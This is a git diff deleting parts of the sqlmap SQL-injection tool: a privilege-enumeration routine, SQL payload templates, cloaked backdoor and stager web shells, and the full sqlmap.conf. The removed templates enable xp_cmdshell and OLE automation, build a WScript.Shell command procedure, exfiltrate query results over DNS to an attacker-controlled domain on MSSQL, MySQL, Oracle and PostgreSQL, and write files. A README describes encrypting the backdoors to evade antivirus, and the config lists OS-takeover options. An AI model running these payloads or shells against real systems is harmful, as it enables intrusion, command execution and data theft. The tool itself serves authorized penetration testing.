Backend.isDbms(DBMS.FIREBIRD): - privileges.add(FIREBIRD_PRIVS[privilege.strip()]) - - # In DB2 we get Y or G if the privilege is - # True, N otherwise - elif Backend.isDbms(DBMS.DB2): - privs = privilege.split(",") - privilege = privs[0] - if len(privs) > 1: - privs = privs[1] - privs = list(privs.strip()) - i = 1 - - for priv in privs: - if priv.upper() in ("Y", "G"): - for position, db2Priv in DB2_PRIVS.items(): - if 
position == i: - privilege += ", " + db2Priv - - i += 1 - - privileges.add(privilege) - - if user in kb.data.cachedUsersPrivileges: - kb.data.cachedUsersPrivileges[user] = list(privileges.union(kb.data.cachedUsersPrivileges[user])) - else: - kb.data.cachedUsersPrivileges[user] = list(privileges) - - if not kb.data.cachedUsersPrivileges and isInferenceAvailable() and not conf.direct: - if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - conditionChar = "LIKE" - else: - conditionChar = "=" - - if not len(users): - users = self.getUsers() - - if Backend.isDbms(DBMS.MYSQL): - for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) - - if parsedUser: - users[users.index(user)] = parsedUser.groups()[0] - - retrievedUsers = set() - - for user in users: - outuser = user - if user in retrievedUsers: - continue - - if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - user = "%%%s%%" % user - - infoMsg = "fetching number of privileges " - infoMsg += "for user '%s'" % outuser - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.count2 % user - elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - query = rootQuery.blind.count % (conditionChar, user) - elif Backend.isDbms(DBMS.ORACLE) and query2: - query = rootQuery.blind.count2 % user - else: - query = rootQuery.blind.count % user - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" - logger.info(infoMsg) - - return self.getPrivileges(query2=True) - - warnMsg = "unable to retrieve the number of " - warnMsg += "privileges for user '%s'" % outuser - logger.warn(warnMsg) - continue - - infoMsg = "fetching privileges for user '%s'" % outuser - logger.info(infoMsg) - - privileges = 
set() - - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) - - for index in indexRange: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.query2 % (user, index) - elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - query = rootQuery.blind.query % (conditionChar, user, index) - elif Backend.isDbms(DBMS.ORACLE) and query2: - query = rootQuery.blind.query2 % (user, index) - elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.query % (index, user) - else: - query = rootQuery.blind.query % (user, index) - - privilege = unArrayizeValue(inject.getValue(query, union=False, error=False)) - - if privilege is None: - continue - - # In PostgreSQL we get 1 if the privilege is True, - # 0 otherwise - if Backend.isDbms(DBMS.PGSQL) and ", " in privilege: - privilege = privilege.replace(", ", ",") - privs = privilege.split(",") - i = 1 - - for priv in privs: - if priv.isdigit() and int(priv) == 1: - for position, pgsqlPriv in PGSQL_PRIVS.items(): - if position == i: - privileges.add(pgsqlPriv) - - i += 1 - - # In MySQL >= 5.0 and Oracle we get the list - # of privileges as string - elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema): - privileges.add(privilege) - - # In MySQL < 5.0 we get Y if the privilege is - # True, N otherwise - elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - privilege = privilege.replace(", ", ",") - privs = privilege.split(",") - i = 1 - - for priv in privs: - if priv.upper() == "Y": - for position, mysqlPriv in MYSQL_PRIVS.items(): - if position == i: - privileges.add(mysqlPriv) - - i += 1 - - # In Firebird we get one letter for each privilege - elif Backend.isDbms(DBMS.FIREBIRD): - privileges.add(FIREBIRD_PRIVS[privilege.strip()]) - - # In DB2 we get Y or G if the privilege is - # True, N otherwise - elif Backend.isDbms(DBMS.DB2): - privs = 
privilege.split(",") - privilege = privs[0] - privs = privs[1] - privs = list(privs.strip()) - i = 1 - - for priv in privs: - if priv.upper() in ("Y", "G"): - for position, db2Priv in DB2_PRIVS.items(): - if position == i: - privilege += ", " + db2Priv - - i += 1 - - privileges.add(privilege) - - # In MySQL < 5.0 we break the cycle after the first - # time we get the user's privileges otherwise we - # duplicate the same query - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - break - - if privileges: - kb.data.cachedUsersPrivileges[user] = list(privileges) - else: - warnMsg = "unable to retrieve the privileges " - warnMsg += "for user '%s'" % outuser - logger.warn(warnMsg) - - retrievedUsers.add(user) - - if not kb.data.cachedUsersPrivileges: - errMsg = "unable to retrieve the privileges " - errMsg += "for the database users" - raise SqlmapNoneDataException(errMsg) - - for user, privileges in kb.data.cachedUsersPrivileges.items(): - if isAdminFromPrivileges(privileges): - areAdmins.add(user) - - return (kb.data.cachedUsersPrivileges, areAdmins) - - def getRoles(self, query2=False): - warnMsg = "on %s the concept of roles does not " % Backend.getIdentifiedDbms() - warnMsg += "exist. sqlmap will enumerate privileges instead" - logger.warn(warnMsg) - - return self.getPrivileges(query2) diff --git a/procs/README.txt b/procs/README.txt deleted file mode 100644 index c693f063..00000000 --- a/procs/README.txt +++ /dev/null @@ -1,4 +0,0 @@ -Files in this folder represent SQL snippets used by sqlmap on the target -system. -They are licensed under the terms of the GNU Lesser General Public License -where not specified otherwise. 
diff --git a/procs/mssqlserver/activate_sp_oacreate.sql b/procs/mssqlserver/activate_sp_oacreate.sql deleted file mode 100644 index 753efb71..00000000 --- a/procs/mssqlserver/activate_sp_oacreate.sql +++ /dev/null @@ -1,4 +0,0 @@ -EXEC master..sp_configure 'show advanced options',1; -RECONFIGURE WITH OVERRIDE; -EXEC master..sp_configure 'ole automation procedures',1; -RECONFIGURE WITH OVERRIDE diff --git a/procs/mssqlserver/configure_openrowset.sql b/procs/mssqlserver/configure_openrowset.sql deleted file mode 100644 index 5f3d6d82..00000000 --- a/procs/mssqlserver/configure_openrowset.sql +++ /dev/null @@ -1,6 +0,0 @@ -EXEC master..sp_configure 'show advanced options', 1; -RECONFIGURE WITH OVERRIDE; -EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%; -RECONFIGURE WITH OVERRIDE; -EXEC sp_configure 'show advanced options', 0; -RECONFIGURE WITH OVERRIDE diff --git a/procs/mssqlserver/configure_xp_cmdshell.sql b/procs/mssqlserver/configure_xp_cmdshell.sql deleted file mode 100644 index 349c8cf8..00000000 --- a/procs/mssqlserver/configure_xp_cmdshell.sql +++ /dev/null @@ -1,6 +0,0 @@ -EXEC master..sp_configure 'show advanced options',1; -RECONFIGURE WITH OVERRIDE; -EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; -RECONFIGURE WITH OVERRIDE; -EXEC sp_configure 'show advanced options',0; -RECONFIGURE WITH OVERRIDE diff --git a/procs/mssqlserver/create_new_xp_cmdshell.sql b/procs/mssqlserver/create_new_xp_cmdshell.sql deleted file mode 100644 index 00573086..00000000 --- a/procs/mssqlserver/create_new_xp_cmdshell.sql +++ /dev/null @@ -1,3 +0,0 @@ -DECLARE @%RANDSTR% nvarchar(999); -set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; -EXEC master..sp_executesql @%RANDSTR% diff --git a/procs/mssqlserver/disable_xp_cmdshell_2000.sql b/procs/mssqlserver/disable_xp_cmdshell_2000.sql deleted file mode 100644 index 
379f6517..00000000 --- a/procs/mssqlserver/disable_xp_cmdshell_2000.sql +++ /dev/null @@ -1 +0,0 @@ -EXEC master..sp_dropextendedproc 'xp_cmdshell' diff --git a/procs/mssqlserver/dns_request.sql b/procs/mssqlserver/dns_request.sql deleted file mode 100644 index a269c7e1..00000000 --- a/procs/mssqlserver/dns_request.sql +++ /dev/null @@ -1,4 +0,0 @@ -DECLARE @host varchar(1024); -SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%'; -EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"') -# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"') diff --git a/procs/mssqlserver/enable_xp_cmdshell_2000.sql b/procs/mssqlserver/enable_xp_cmdshell_2000.sql deleted file mode 100644 index 2ec15522..00000000 --- a/procs/mssqlserver/enable_xp_cmdshell_2000.sql +++ /dev/null @@ -1 +0,0 @@ -EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll' diff --git a/procs/mssqlserver/run_statement_as_user.sql b/procs/mssqlserver/run_statement_as_user.sql deleted file mode 100644 index 575c22ef..00000000 --- a/procs/mssqlserver/run_statement_as_user.sql +++ /dev/null @@ -1,3 +0,0 @@ -SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%') -# SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%') -# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%') diff --git a/procs/mysql/dns_request.sql b/procs/mysql/dns_request.sql deleted file mode 100644 index e32fc478..00000000 --- a/procs/mysql/dns_request.sql +++ /dev/null @@ -1 +0,0 @@ -SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%')) diff --git a/procs/mysql/write_file_limit.sql b/procs/mysql/write_file_limit.sql deleted file mode 100644 index 58fccab0..00000000 --- a/procs/mysql/write_file_limit.sql +++ /dev/null @@ -1 +0,0 @@ -LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- diff --git 
a/procs/oracle/dns_request.sql b/procs/oracle/dns_request.sql deleted file mode 100644 index adb71cfb..00000000 --- a/procs/oracle/dns_request.sql +++ /dev/null @@ -1,2 +0,0 @@ -SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL -# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL diff --git a/procs/postgresql/dns_request.sql b/procs/postgresql/dns_request.sql deleted file mode 100644 index 6724af22..00000000 --- a/procs/postgresql/dns_request.sql +++ /dev/null @@ -1,14 +0,0 @@ -DROP TABLE IF EXISTS %RANDSTR1%; -# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required -CREATE TABLE %RANDSTR1%(%RANDSTR2% text); -CREATE OR REPLACE FUNCTION %RANDSTR3%() -RETURNS VOID AS $$ -DECLARE %RANDSTR4% TEXT; -DECLARE %RANDSTR5% TEXT; -BEGIN -SELECT INTO %RANDSTR5% (%QUERY%); -%RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\''; -EXECUTE %RANDSTR4%; -END; -$$ LANGUAGE plpgsql SECURITY DEFINER; -SELECT %RANDSTR3%(); \ No newline at end of file diff --git a/shell/README.txt b/shell/README.txt deleted file mode 100644 index 6e2e08cf..00000000 --- a/shell/README.txt +++ /dev/null @@ -1,11 +0,0 @@ -Due to the anti-virus positive detection of shell scripts stored inside -this folder, we needed to somehow circumvent this. As from the plain -sqlmap users perspective nothing has to be done prior to their usage by -sqlmap, but if you want to have access to their original source code use -the decrypt functionality of the ../extra/cloak/cloak.py utility. 
- -To prepare the original scripts to the cloaked form use this command: -find backdoor.* stager.* -type f -exec python ../extra/cloak/cloak.py -i '{}' \; - -To get back them into the original form use this: -find backdoor.*_ stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \; diff --git a/shell/backdoor.asp_ b/shell/backdoor.asp_ deleted file mode 100644 index d126faee..00000000 --- a/shell/backdoor.asp_ +++ /dev/null @@ -1,2 +0,0 @@ -œ…ŽË1ÃOo:÷þŠ‘¥+ÍÆý~lv-\SÒkÙ>é}©UÉ´¤5“Dwþa›†×}±óîF ;KEè -šÁÁzKP'çýÄÊÍ©,Zïu¦;–ÑøX’ã¿+QŠ ­@¹ë¦:ýÿ¢ÎÚ¦D°Vèð Þ~©1µxrAØá·`ÝO†a”m¹‡7ñÄ0Nk0Øn€¯Ä+›‰(¬À+²¸¼ÊÄ VÕƒºÏÓÕ TI£koC³ð¦N³®ömæ»Ö»¶Z¢«>î6”oÂxƒvAQ0`(‡¾³È5ÓGœºdø]wÈDù \ No newline at end of file diff --git a/shell/backdoor.aspx_ b/shell/backdoor.aspx_ deleted file mode 100644 index af7f6d58..00000000 Binary files a/shell/backdoor.aspx_ and /dev/null differ diff --git a/shell/backdoor.jsp_ b/shell/backdoor.jsp_ deleted file mode 100644 index ef32603b..00000000 Binary files a/shell/backdoor.jsp_ and /dev/null differ diff --git a/shell/backdoor.php_ b/shell/backdoor.php_ deleted file mode 100644 index 172dd5f2..00000000 Binary files a/shell/backdoor.php_ and /dev/null differ diff --git a/shell/runcmd.exe_ b/shell/runcmd.exe_ deleted file mode 100644 index 5e0d05a9..00000000 Binary files a/shell/runcmd.exe_ and /dev/null differ diff --git a/shell/stager.asp_ b/shell/stager.asp_ deleted file mode 100644 index 75a64c1f..00000000 Binary files a/shell/stager.asp_ and /dev/null differ diff --git a/shell/stager.aspx_ b/shell/stager.aspx_ deleted file mode 100644 index 54d56503..00000000 Binary files a/shell/stager.aspx_ and /dev/null differ diff --git a/shell/stager.jsp_ b/shell/stager.jsp_ deleted file mode 100644 index 0aa08860..00000000 Binary files a/shell/stager.jsp_ and /dev/null differ diff --git a/shell/stager.php_ b/shell/stager.php_ deleted file mode 100644 index 64f8eaca..00000000 Binary files a/shell/stager.php_ and /dev/null differ diff --git a/sqlmap.conf b/sqlmap.conf 
deleted file mode 100644 index fb0e0018..00000000 --- a/sqlmap.conf +++ /dev/null @@ -1,790 +0,0 @@ -# At least one of these options has to be specified to set the source to -# get target URLs from. -[Target] - -# Direct connection to the database. -# Examples: -# mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME -# oracle://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_SID -direct = - -# Target URL. -# Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2 -url = - -# Parse targets from Burp or WebScarab logs -# Valid: Burp proxy (http://portswigger.net/suite/) requests log file path -# or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) -# 'conversations/' folder path -logFile = - -# Scan multiple targets enlisted in a given textual file -bulkFile = - -# Load HTTP request from a file -# Example (file content): POST /login.jsp HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/4.0\n\nuserid=joe&password=guessme -requestFile = - -# Rather than providing a target URL, let Google return target -# hosts as result of your Google dork expression. For a list of Google -# dorks see Johnny Long Google Hacking Database at -# http://johnny.ihackstuff.com/ghdb.php. -# Example: +ext:php +inurl:"&id=" +intext:"powered by " -googleDork = - -# Parse target(s) from remote sitemap(.xml) file. -# Example: http://192.168.1.121/sitemap.xml -sitemapUrl = - - -# These options can be used to specify how to connect to the target URL. -[Request] - -# Force usage of given HTTP method (e.g. PUT). -method = - -# Data string to be sent through POST. -data = - -# Character used for splitting parameter values. -paramDel = - -# HTTP Cookie header value. -cookie = - -# Character used for splitting cookie values. -cookieDel = - -# File containing cookies in Netscape/wget format. -loadCookies = - -# Ignore Set-Cookie header from response. -# Valid: True or False -dropSetCookie = False - -# HTTP User-Agent header value. 
Useful to fake the HTTP User-Agent header value -# at each HTTP request. -# sqlmap will also test for SQL injection on the HTTP User-Agent value. -agent = - -# Use randomly selected HTTP User-Agent header value. -# Valid: True or False -randomAgent = False - -# HTTP Host header value. -host = - -# HTTP Referer header. Useful to fake the HTTP Referer header value at -# each HTTP request. -referer = - -# Extra HTTP headers -headers = Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 - -# HTTP Authentication type. Useful only if the target URL requires -# HTTP Basic, Digest or NTLM authentication and you have such data. -# Valid: Basic, Digest, NTLM or PKI -authType = - -# HTTP authentication credentials. Useful only if the target URL requires -# HTTP Basic, Digest or NTLM authentication and you have such data. -# Syntax: username:password -authCred = - -# HTTP Authentication PEM private/cert key file. Useful only if the target URL requires -# PKI authentication and you have such data. -# Syntax: key_file -authFile = - -# Use a proxy to connect to the target URL. -# Syntax: (http|https|socks4|socks5)://address:port -proxy = - -# Proxy authentication credentials. Useful only if the proxy requires -# Basic or Digest authentication and you have such data. -# Syntax: username:password -proxyCred = - -# Load proxy list from a file -proxyFile = - -# Ignore system default proxy settings. -# Valid: True or False -ignoreProxy = False - -# Use Tor anonymity network. -# Valid: True or False -tor = False - -# Set Tor proxy port other than default. -# Valid: integer -# torPort = - -# Set Tor proxy type. -# Valid: HTTP, SOCKS4, SOCKS5 -torType = HTTP - -# Check to see if Tor is used properly. -# Valid: True or False -checkTor = False - -# Delay in seconds between each HTTP request. 
-# Valid: float -# Default: 0 -delay = 0 - -# Seconds to wait before timeout connection. -# Valid: float -# Default: 30 -timeout = 30 - -# Maximum number of retries when the HTTP connection timeouts. -# Valid: integer -# Default: 3 -retries = 3 - -# Randomly change value for the given parameter. -rParam = - -# URL address to visit frequently during testing. -# Example: http://192.168.1.121/index.html -safeUrl = - -# POST data to send to a safe URL. -# Example: username=admin&password=passw0rd! -safePost = - -# Load safe HTTP request from a file. -safeReqFile = - -# Test requests between two visits to a given safe URL (default 0). -# Valid: integer -# Default: 0 -safeFreq = 0 - -# Skip URL encoding of payload data -# Valid: True or False -skipUrlEncode = False - -# Parameter used to hold anti-CSRF token -csrfToken = - -# URL address to visit to extract anti-CSRF token -csrfUrl = - -# Force usage of SSL/HTTPS -# Valid: True or False -forceSSL = False - -# Use HTTP parameter pollution. -# Valid: True or False -hpp = False - -# Evaluate provided Python code before the request. -# Example: import hashlib;id2=hashlib.md5(id).hexdigest() -evalCode = - -# These options can be used to optimize the performance of sqlmap. -[Optimization] - -# Use all optimization options. -# Valid: True or False -optimize = False - -# Predict common queries output. -# Valid: True or False -predictOutput = False - -# Use persistent HTTP(s) connections. -keepAlive = False - -# Retrieve page length without actual HTTP response body. -# Valid: True or False -nullConnection = False - -# Maximum number of concurrent HTTP(s) requests (handled with Python threads) -# to be used in the inference SQL injection attack. -# Valid: integer -# Default: 1 -threads = 1 - - -# These options can be used to specify which parameters to test for, -# provide custom injection payloads and optional tampering scripts. -[Injection] - -# Testable parameter(s) comma separated. 
By default all GET/POST/Cookie -# parameters and HTTP User-Agent are tested by sqlmap. -testParameter = - -# Skip testing for given parameter(s). -skip = - -# Skip testing parameters that not appear dynamic. -# Valid: True or False -skipStatic = False - -# Force back-end DBMS to this value. If this option is set, the back-end -# DBMS identification process will be minimized as needed. -# If not set, sqlmap will detect back-end DBMS automatically by default. -# Valid: mssql, mysql, mysql 4, mysql 5, oracle, pgsql, sqlite, sqlite3, -# access, firebird, maxdb, sybase -dbms = - -# DBMS authentication credentials (user:password). Useful if you want to -# run SQL statements as another user, the back-end database management -# system is PostgreSQL or Microsoft SQL Server and the parameter is -# vulnerable by stacked queries SQL injection or you are connecting directly -# to the DBMS (-d switch). -# Syntax: username:password -dbmsCred = - -# Force back-end DBMS operating system to this value. If this option is -# set, the back-end DBMS identification process will be minimized as -# needed. -# If not set, sqlmap will detect back-end DBMS operating system -# automatically by default. -# Valid: linux, windows -os = - -# Use big numbers for invalidating values. -# Valid: True or False -invalidBignum = False - -# Use logical operations for invalidating values. -# Valid: True or False -invalidLogical = False - -# Use random strings for invalidating values. -# Valid: True or False -invalidString = False - -# Turn off payload casting mechanism -# Valid: True or False -noCast = False - -# Turn off string escaping mechanism -# Valid: True or False -noEscape = False - -# Injection payload prefix string. -prefix = - -# Injection payload suffix string. -suffix = - -# Use given script(s) for tampering injection data. -tamper = - - -# These options can be used to specify how to parse and compare page -# content from HTTP responses when using blind SQL injection technique. 
-[Detection] - -# Level of tests to perform. -# The higher the value is, the higher the number of HTTP(s) requests are -# as well as the better chances to detect a tricky SQL injection. -# Valid: Integer between 1 and 5 -# Default: 1 -level = 1 - -# Risk of tests to perform. -# Note: boolean-based blind SQL injection tests with AND are considered -# risk 1, with OR are considered risk 3. -# Valid: Integer between 1 and 3 -# Default: 1 -risk = 1 - -# String to match within the raw response when the query is evaluated to -# True, only needed if the page content dynamically changes at each refresh. -# Refer to the user's manual for further details. -string = - -# String to match within the raw response when the query is evaluated to -# False, only needed if the page content dynamically changes at each refresh. -# Refer to the user's manual for further details. -notString = - -# Regular expression to match within the raw response when the query is -# evaluated to True, only needed if the needed if the page content -# dynamically changes at each refresh. -# Refer to the user's manual for further details. -# Valid: regular expression with Python syntax -# (http://www.python.org/doc/2.5.2/lib/re-syntax.html) -regexp = - -# HTTP response code to match when the query is True. -# Valid: Integer -# Example: 200 (assuming any False statement returns a different response -# code) -# code = - -# Compare pages based only on the textual content. -# Valid: True or False -textOnly = False - -# Compare pages based only on their titles. -# Valid: True or False -titles = False - - -# These options can be used to tweak testing of specific SQL injection -# techniques. -[Techniques] - -# SQL injection techniques to use. 
-# Valid: a string composed by B, E, U, S, T and Q where: -# B: Boolean-based blind SQL injection -# E: Error-based SQL injection -# U: UNION query SQL injection -# S: Stacked queries SQL injection -# T: Time-based blind SQL injection -# Q: Inline SQL injection -# Example: ES (means test for error-based and stacked queries SQL -# injection types only) -# Default: BEUSTQ (means test for all SQL injection types - recommended) -tech = BEUSTQ - -# Seconds to delay the response from the DBMS. -# Valid: integer -# Default: 5 -timeSec = 5 - -# Range of columns to test for -# Valid: range of integers -# Example: 1-10 -uCols = - -# Character to use for bruteforcing number of columns -# Valid: string -# Example: NULL -uChar = - -# Table to use in FROM part of UNION query SQL injection -# Valid: string -# Example: INFORMATION_SCHEMA.COLLATIONS -uFrom = - -# Domain name used for DNS exfiltration attack -# Valid: string -dnsName = - -# Resulting page URL searched for second-order response -# Valid: string -secondOrder = - - -[Fingerprint] - -# Perform an extensive back-end database management system fingerprint -# based on various techniques. -# Valid: True or False -extensiveFp = False - - -# These options can be used to enumerate the back-end database -# management system information, structure and data contained in the -# tables. Moreover you can run your own SQL statements. -[Enumeration] - -# Retrieve everything -# Valid: True or False -getAll = False - -# Retrieve back-end database management system banner. -# Valid: True or False -getBanner = False - -# Retrieve back-end database management system current user. -# Valid: True or False -getCurrentUser = False - -# Retrieve back-end database management system current database. -# Valid: True or False -getCurrentDb = False - -# Retrieve back-end database management system server hostname. -# Valid: True or False -getHostname = False - -# Detect if the DBMS current user is DBA. 
-# Valid: True or False -isDba = False - -# Enumerate back-end database management system users. -# Valid: True or False -getUsers = False - -# Enumerate back-end database management system users password hashes. -# Valid: True or False -getPasswordHashes = False - -# Enumerate back-end database management system users privileges. -# Valid: True or False -getPrivileges = False - -# Enumerate back-end database management system users roles. -# Valid: True or False -getRoles = False - -# Enumerate back-end database management system databases. -# Valid: True or False -getDbs = False - -# Enumerate back-end database management system database tables. -# Optional: db -# Valid: True or False -getTables = False - -# Enumerate back-end database management system database table columns. -# Optional: db, tbl, col -# Valid: True or False -getColumns = False - -# Enumerate back-end database management system schema. -# Valid: True or False -getSchema = False - -# Retrieve number of entries for table(s). -# Valid: True or False -getCount = False - -# Dump back-end database management system database table entries. -# Requires: tbl and/or col -# Optional: db -# Valid: True or False -dumpTable = False - -# Dump all back-end database management system databases tables entries. -# Valid: True or False -dumpAll = False - -# Search column(s), table(s) and/or database name(s). -# Requires: db, tbl or col -# Valid: True or False -search = False - -# Retrieve back-end database management system comments. -# Valid: True or False -getComments = False - -# Back-end database management system database to enumerate. -db = - -# Back-end database management system database table(s) to enumerate. -tbl = - -# Back-end database management system database table column(s) to enumerate. -col = - -# Back-end database management system database table column(s) to not enumerate. -excludeCol = - -# Use WHERE condition while table dumping (e.g. "id=1"). 
-dumpWhere = - -# Back-end database management system database user to enumerate. -user = - -# Exclude DBMS system databases when enumerating tables. -# Valid: True or False -excludeSysDbs = False - -# First query output entry to retrieve -# Valid: integer -# Default: 0 (sqlmap will start to retrieve the query output entries from -# the first) -limitStart = 0 - -# Last query output entry to retrieve -# Valid: integer -# Default: 0 (sqlmap will detect the number of query output entries and -# retrieve them until the last) -limitStop = 0 - -# First query output word character to retrieve -# Valid: integer -# Default: 0 (sqlmap will enumerate the query output from the first -# character) -firstChar = 0 - -# Last query output word character to retrieve -# Valid: integer -# Default: 0 (sqlmap will enumerate the query output until the last -# character) -lastChar = 0 - -# SQL statement to be executed. -# Example: SELECT 'foo', 'bar' -query = - -# Prompt for an interactive SQL shell. -# Valid: True or False -sqlShell = False - -# Execute SQL statements from given file(s). -sqlFile = - - -# These options can be used to run brute force checks. -[Brute force] - -# Check existence of common tables. -# Valid: True or False -commonTables = False - -# Check existence of common columns. -# Valid: True or False -commonColumns = False - - -# These options can be used to create custom user-defined functions. -[User-defined function] - -# Inject custom user-defined functions -# Valid: True or False -udfInject = False - -# Local path of the shared library -shLib = - - -# These options can be used to access the back-end database management -# system underlying file system. -[File system] - -# Read a specific file from the back-end DBMS underlying file system. -# Examples: /etc/passwd or C:\boot.ini -rFile = - -# Write a local file to a specific path on the back-end DBMS underlying -# file system. 
-# Example: /tmp/sqlmap.txt or C:\WINNT\Temp\sqlmap.txt -wFile = - -# Back-end DBMS absolute filepath to write the file to. -dFile = - - -# These options can be used to access the back-end database management -# system underlying operating system. -[Takeover] - -# Execute an operating system command. -# Valid: operating system command -osCmd = - -# Prompt for an interactive operating system shell. -# Valid: True or False -osShell = False - -# Prompt for an out-of-band shell, Meterpreter or VNC. -# Valid: True or False -osPwn = False - -# One click prompt for an out-of-band shell, Meterpreter or VNC. -# Valid: True or False -osSmb = False - -# Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored -# procedure heap-based buffer overflow (MS09-004) exploitation. -# Valid: True or False -osBof = False - -# Database process' user privilege escalation. -# Note: Use in conjunction with osPwn, osSmb or osBof. It will force the -# payload to be Meterpreter. -privEsc = False - -# Local path where Metasploit Framework is installed. -# Valid: file system path -msfPath = - -# Remote absolute path of temporary files directory. -# Valid: absolute file system path -tmpPath = - - -# These options can be used to access the back-end database management -# system Windows registry. -[Windows] - -# Read a Windows registry key value. -# Valid: True or False -regRead = False - -# Write a Windows registry key value data. -# Valid: True or False -regAdd = False - -# Delete a Windows registry key value. -# Valid: True or False -regDel = False - -# Windows registry key. -regKey = - -# Windows registry key value. -regVal = - -# Windows registry key value data. -regData = - -# Windows registry key value type. -regType = - - -# These options can be used to set some general working parameters. -[General] - -# Load session from a stored (.sqlite) file -# Example: output/www.target.com/session.sqlite -sessionFile = - -# Log all HTTP traffic into a textual file. 
-trafficFile = - -# Never ask for user input, use the default behaviour. -# Valid: True or False -batch = False - -# Force character encoding used for data retrieval. -charset = - -# Crawl the website starting from the target URL. -# Valid: integer -# Default: 0 -crawlDepth = 0 - -# Regexp to exclude pages from crawling (e.g. "logout"). -crawlExclude = - -# Delimiting character used in CSV output. -# Default: , -csvDel = , - -# Format of dumped data -# Valid: CSV, HTML or SQLITE -dumpFormat = CSV - -# Retrieve each query output length and calculate the estimated time of -# arrival in real time. -# Valid: True or False -eta = False - -# Flush session files for current target. -# Valid: True or False -flushSession = False - -# Parse and test forms on target URL. -# Valid: True or False -forms = False - -# Ignore query results stored in session file. -# Valid: True or False -freshQueries = False - -# Use DBMS hex function(s) for data retrieval. -# Valid: True or False -hexConvert = False - -# Custom output directory path. -outputDir = - -# Parse and display DBMS error messages from responses. -# Valid: True or False -parseErrors = False - -# Pivot column name. -pivotColumn = - -# Regular expression for filtering targets from provided Burp. -# or WebScarab proxy log. -# Example: (google|yahoo) -scope = - -# Select tests by payloads and/or titles (e.g. ROW) -testFilter = - -# Skip tests by payloads and/or titles (e.g. BENCHMARK) -testSkip = - -# Update sqlmap. -# Valid: True or False -updateAll = False - - -[Miscellaneous] - -# Run host OS command(s) when SQL injection is found. -alert = - -# Set question answers (e.g. "quit=N,follow=N"). -answers = - -# Beep on question and/or when SQL injection is found. -# Valid: True or False -beep = False - -# Offline WAF/IPS/IDS payload detection testing. -# Valid: True or False -checkPayload = False - -# Clean up the DBMS from sqlmap specific UDF and tables. 
-# Valid: True or False -cleanup = False - -# Check for missing (non-core) sqlmap dependencies. -# Valid: True or False -dependencies = False - -# Disable console output coloring. -# Valid: True or False -disableColoring = False - -# Use Google dork results from specified page number. -# Valid: integer -# Default: 1 -googlePage = 1 - -# Make a thorough testing for a WAF/IPS/IDS protection. -# Valid: True or False -identifyWaf = False - -# Skip heuristic detection of WAF/IPS/IDS protection. -# Valid: True or False -skipWaf = False - -# Imitate smartphone through HTTP User-Agent header. -# Valid: True or False -mobile = False - -# Work in offline mode (only use session data) -# Valid: True or False -offline = False - -# Display page rank (PR) for Google dork results. -# Valid: True or False -pageRank = False - -# Conduct thorough tests only if positive heuristic(s). -# Valid: True or False -smart = False - -# Simple wizard interface for beginner users. -# Valid: True or False -wizard = False - -# Verbosity level. 
